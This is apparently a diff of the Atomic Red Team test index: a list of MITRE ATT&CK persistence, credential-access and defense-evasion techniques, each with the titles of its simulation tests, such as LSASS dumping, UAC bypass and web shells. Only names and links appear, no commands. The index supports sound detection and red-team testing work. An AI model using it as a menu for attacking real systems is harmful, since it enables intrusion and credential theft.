- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1034 Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- [T1547.011 Plist Modification](../../T1547.011/T1547.011.md)
- Atomic Test #1: Plist Modification [macos]
- [T1547.010 Port Monitors](../../T1547.010/T1547.010.md)
- Atomic Test #1: Add Port Monitor persistence in Registry [windows]
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md)
- Atomic Test #1: Append malicious start-process cmdlet [windows]
- T1547.012 Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1055.012 Process Hollowing](../../T1055.012/T1055.012.md)
- Atomic Test #1: Process Hollowing using PowerShell [windows]
- Atomic Test #2: RunPE via VBA [windows]
- [T1055 Process Injection](../../T1055/T1055.md)
- Atomic Test #1: Shellcode execution via VBA [windows]
- Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows]
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.004 Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
- Atomic Test #2: rc.common [linux]
- Atomic Test #3: rc.local [linux]
- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md)
- Atomic Test #1: Re-Opened Applications [macos]
- Atomic Test #2: Re-Opened Applications [macos]
@@ -416,34 +124,24 @@
- Atomic Test #4: Suspicious vbs file run from startup Folder [windows]
- Atomic Test #5: Suspicious jse file run from startup Folder [windows]
- Atomic Test #6: Suspicious bat file run from startup Folder [windows]
- Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
- Atomic Test #8: Add persistance via Recycle bin [windows]
- Atomic Test #9: SystemBC Malware-as-a-Service Registry [windows]
- [T1134.005 SID-History Injection](../../T1134.005/T1134.005.md)
- Atomic Test #1: Injection SID-History with mimikatz [windows]
- T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- Atomic Test #5: Task Scheduler via VBA [windows]
- Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
- Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.002 Screensaver](../../T1546.002/T1546.002.md)
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
- [T1547.005 Security Support Provider](../../T1547.005/T1547.005.md)
- Atomic Test #1: Modify SSP configuration in registry [windows]
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- Atomic Test #2: Service ImagePath Change with reg.exe [windows]
- [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
- Atomic Test #3: Set a SetGID flag on file [macos, linux]
- Atomic Test #4: Make and modify capabilities of a binary [linux]
- Atomic Test #5: Provide the SetUID capability to a file [linux]
- [T1547.009 Shortcut Modification](../../T1547.009/T1547.009.md)
- Atomic Test #1: Shortcut Modification [windows]
- Atomic Test #2: Create shortcut to cmd in startup folders [windows]
@@ -455,53 +153,323 @@
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- Atomic Test #2: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- Atomic Test #2: Create a user level transient systemd service and timer [linux]
- Atomic Test #3: Create a system level transient systemd service and timer [linux]
- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.003 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547.003 Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1134.001 Token Impersonation/Theft](../../T1134.001/T1134.001.md)
- Atomic Test #1: Named pipe client impersonation [windows]
- Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
- [T1546.005 Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap [macos, linux]
- [T1546.004 Unix Shell Configuration Modification](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.003 Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md)
- Atomic Test #1: Persistence via WMI Event Subscription [windows]
- [T1543.003 Windows Service](../../T1543.003/T1543.003.md)
- Atomic Test #1: Modify Fax service to run PowerShell [windows]
- Atomic Test #2: Service Installation CMD [windows]
- Atomic Test #3: Service Installation PowerShell [windows]
- Atomic Test #4: TinyTurla backdoor service w64time [windows]
- [T1547.004 Winlogon Helper DLL](../../T1547.004/T1547.004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
- Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]
- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# persistence
- [T1546.004 .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md)
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
- [T1098 Account Manipulation](../../T1098/T1098.md)
- Atomic Test #1: Admin Account Manipulate [windows]
- Atomic Test #2: Domain Account and Group Manipulate [windows]
- T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1098.001 Additional Azure Service Principal Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md)
- Atomic Test #1: Install AppInit Shim [windows]
- [T1546.011 Application Shimming](../../T1546.011/T1546.011.md)
- Atomic Test #1: Application Shim Installation [windows]
- Atomic Test #2: New shim database files created in the default shim database directory [windows]
- Atomic Test #3: Registry key creation and/or modification events for SDB [windows]
- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md)
- Atomic Test #1: At - Schedule a job [linux]
- [T1053.002 At (Windows)](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1197 BITS Jobs](../../T1197/T1197.md)
- Atomic Test #1: Bitsadmin Download (cmd) [windows]
- Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
- Atomic Test #3: Persist, Download, & Execute [windows]
- Atomic Test #4: Bits download using destktopimgdownldr.exe (cmd) [windows]
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
- [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
- Atomic Test #1: Change Default File Association [windows]
- T1136.003 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1136 Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.003 Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to cron folder [macos, linux]
- [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
- [T1136.002 Domain Account](../../T1136.002/T1136.002.md)
- Atomic Test #1: Create a new Windows domain admin user [windows]
- Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.014 Emond](../../T1546.014/T1546.014.md)
- Atomic Test #1: Persistance with Event Monitor - emond [macos]
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1098.002 Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1133 External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1062 Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.012 Image File Execution Options Injection](../../T1546.012/T1546.012.md)
- Atomic Test #1: IFEO Add Debugger [windows]
- Atomic Test #2: IFEO Global Flags [windows]
- T1525 Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1547.006 Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
- Atomic Test #1: Linux - Load Kernel Module via insmod [linux]
- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.006 LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- T1547.008 LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1543.001 Launch Agent](../../T1543.001/T1543.001.md)
- Atomic Test #1: Launch Agent [macos]
- [T1543.004 Launch Daemon](../../T1543.004/T1543.004.md)
- Atomic Test #1: Launch Daemon [macos]
- [T1053.004 Launchd](../../T1053.004/T1053.004.md)
- Atomic Test #1: Event Monitor Daemon Persistence [macos]
- [T1136.001 Local Account](../../T1136.001/T1136.001.md)
- Atomic Test #1: Create a user account on a Linux system [linux]
- Atomic Test #2: Create a user account on a MacOS system [macos]
- Atomic Test #3: Create a new user in a command prompt [windows]
- Atomic Test #4: Create a new user in PowerShell [windows]
- Atomic Test #5: Create a new user in Linux with `root` UID and GID. [linux]
- Atomic Test #6: Create a new Windows admin user [windows]
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.002 Logon Script (Mac)](../../T1037.002/T1037.002.md)
- Atomic Test #1: Logon Scripts - Mac [macos]
- [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md)
- Atomic Test #1: Logon Scripts [windows]
- [T1546.007 Netsh Helper DLL](../../T1546.007/T1546.007.md)
- Atomic Test #1: Netsh Helper DLL Registration [windows]
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137 Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1137.002 Office Test](../../T1137.002/T1137.002.md)
- Atomic Test #1: Office Apllication Startup Test Persistence [windows]
- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.004 Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1034 Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- [T1547.011 Plist Modification](../../T1547.011/T1547.011.md)
- Atomic Test #1: Plist Modification [macos]
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1547.010 Port Monitors](../../T1547.010/T1547.010.md)
- Atomic Test #1: Add Port Monitor persistence in Registry [windows]
- [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md)
- Atomic Test #1: Append malicious start-process cmdlet [windows]
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.004 Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md)
- Atomic Test #1: Re-Opened Applications [macos]
- Atomic Test #2: Re-Opened Applications [macos]
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1547.001 Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md)
- Atomic Test #1: Reg Key Run [windows]
- Atomic Test #2: Reg Key RunOnce [windows]
- Atomic Test #3: PowerShell Registry RunOnce [windows]
- Atomic Test #4: Suspicious vbs file run from startup Folder [windows]
- Atomic Test #5: Suspicious jse file run from startup Folder [windows]
- Atomic Test #6: Suspicious bat file run from startup Folder [windows]
- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
- Atomic Test #1: Modify SSH Authorized Keys [macos, linux]
- [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.002 Screensaver](../../T1546.002/T1546.002.md)
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
- [T1547.005 Security Support Provider](../../T1547.005/T1547.005.md)
- Atomic Test #1: Modify SSP configuration in registry [windows]
- T1505 Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- [T1547.009 Shortcut Modification](../../T1547.009/T1547.009.md)
- Atomic Test #1: Shortcut Modification [windows]
- Atomic Test #2: Create shortcut to cmd in startup folders [windows]
- [T1037.005 Startup Items](../../T1037.005/T1037.005.md)
- Atomic Test #1: Add file to Local Library StartupItems [macos]
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- T1547.003 Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1505.002 Transport Agent](../../T1505.002/T1505.002.md)
- Atomic Test #1: Install MS Exchange Transport Agent Persistence [windows]
- [T1546.005 Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap [macos, linux]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1505.003 Web Shell](../../T1505.003/T1505.003.md)
- Atomic Test #1: Web Shell Written to Disk [windows]
- [T1546.003 Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md)
- Atomic Test #1: Persistence via WMI Event Subscription [windows]
- [T1543.003 Windows Service](../../T1543.003/T1543.003.md)
- Atomic Test #1: Modify Fax service to run PowerShell [windows]
- Atomic Test #2: Service Installation CMD [windows]
- Atomic Test #3: Service Installation PowerShell [windows]
- [T1547.004 Winlogon Helper DLL](../../T1547.004/T1547.004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
- Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]
# credential-access
- T1003.008 /etc/passwd and /etc/shadow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1552.003 Bash History](../../T1552.003/T1552.003.md)
- Atomic Test #1: Search Through Bash History [linux, macos]
- T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1003.005 Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1552.005 Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
- Atomic Test #2: Extract passwords with grep [macos, linux]
- Atomic Test #3: Extracting passwords with findstr [windows]
- Atomic Test #4: Access unattend.xml [windows]
- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #1: Run Chrome-password Collector [windows]
- Atomic Test #2: Search macOS Safari Cookies [macos]
- [T1552.002 Credentials in Registry](../../T1552.002/T1552.002.md)
- Atomic Test #1: Enumeration for Credentials in Registry [windows]
- Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
- T1003.006 DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1187 Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #1: AppleScript - Prompt User for Password [macos]
- Atomic Test #2: PowerShell - Prompt User for Password [windows]
- T1558.001 Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1552.006 Group Policy Preferences](../../T1552.006/T1552.006.md)
- Atomic Test #1: GPP Passwords (findstr) [windows]
- Atomic Test #2: GPP Passwords (Get-GPPPassword) [windows]
- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1558.003 Kerberoasting](../../T1558.003/T1558.003.md)
- Atomic Test #1: Request for service tickets [windows]
- [T1555.001 Keychain](../../T1555.001/T1555.001.md)
- Atomic Test #1: Keychain [macos]
- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #1: Input Capture [windows]
- T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1003.004 LSA Secrets](../../T1003.004/T1003.004.md)
- Atomic Test #1: Dumping LSA Secrets [windows]
- [T1003.001 LSASS Memory](../../T1003.001/T1003.001.md)
- Atomic Test #1: Windows Credential Editor [windows]
- Atomic Test #2: Dump LSASS.exe Memory using ProcDump [windows]
- Atomic Test #3: Dump LSASS.exe Memory using comsvcs.dll [windows]
- Atomic Test #4: Dump LSASS.exe Memory using direct system calls and API unhooking [windows]
- Atomic Test #5: Dump LSASS.exe Memory using Windows Task Manager [windows]
- Atomic Test #6: Offline Credential Theft With Mimikatz [windows]
- Atomic Test #7: LSASS read with pypykatz [windows]
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1003.003 NTDS](../../T1003.003/T1003.003.md)
- Atomic Test #1: Create Volume Shadow Copy with vssadmin [windows]
- Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy [windows]
- Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows]
- Atomic Test #4: Create Volume Shadow Copy with WMI [windows]
- Atomic Test #5: Create Volume Shadow Copy with Powershell [windows]
- Atomic Test #6: Create Symlink to Volume Shadow Copy [windows]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux [linux]
- Atomic Test #2: Packet Capture macOS [macos]
- Atomic Test #3: Packet Capture Windows Command Prompt [windows]
- Atomic Test #4: Windows Internal Packet Capture [windows]
- [T1003 OS Credential Dumping](../../T1003/T1003.md)
- Atomic Test #1: Powershell Mimikatz [windows]
- Atomic Test #2: Gsecdump [windows]
- Atomic Test #3: Credential Dumping with NPPSpy [windows]
- [T1110.002 Password Cracking](../../T1110.002/T1110.002.md)
- Atomic Test #1: Password Cracking with Hashcat [windows]
- [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md)
- Atomic Test #1: Install and Register Password Filter DLL [windows]
- [T1110.001 Password Guessing](../../T1110.001/T1110.001.md)
- Atomic Test #1: Brute Force Credentials [windows]
- [T1110.003 Password Spraying](../../T1110.003/T1110.003.md)
- Atomic Test #1: Password Spray all Domain Users [windows]
- Atomic Test #2: Password Spray (DomainPasswordSpray) [windows]
- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #1: Private Keys [windows]
- Atomic Test #2: Discover Private SSH Keys [macos, linux]
- Atomic Test #3: Copy Private SSH Keys with CP [linux]
- Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
- T1003.007 Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md)
- Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
- Atomic Test #2: Registry parse with pypykatz [windows]
- Atomic Test #3: esentutl.exe SAM copy [windows]
- Atomic Test #4: PowerDump Registry dump of SAM for hashes and usernames [windows]
- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1558.002 Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1111 Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# defense-evasion
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1055.004 Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
- Atomic Test #1: Process Injection via C# [windows]
- [T1197 BITS Jobs](../../T1197/T1197.md)
- Atomic Test #1: Bitsadmin Download (cmd) [windows]
- Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
- Atomic Test #3: Persist, Download, & Execute [windows]
- Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows]
- Atomic Test #4: Bits download using destktopimgdownldr.exe (cmd) [windows]
- [T1027.001 Binary Padding](../../T1027.001/T1027.001.md)
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1612 Build Image on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md)
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1548.002 Bypass User Access Control](../../T1548.002/T1548.002.md)
- Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
- Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
@@ -509,16 +477,6 @@
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
- Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- Atomic Test #10: UACME Bypass Method 23 [windows]
- Atomic Test #11: UACME Bypass Method 31 [windows]
- Atomic Test #12: UACME Bypass Method 33 [windows]
- Atomic Test #13: UACME Bypass Method 34 [windows]
- Atomic Test #14: UACME Bypass Method 39 [windows]
- Atomic Test #15: UACME Bypass Method 56 [windows]
- Atomic Test #16: UACME Bypass Method 59 [windows]
- Atomic Test #17: UACME Bypass Method 61 [windows]
- [T1218.003 CMSTP](../../T1218.003/T1218.003.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
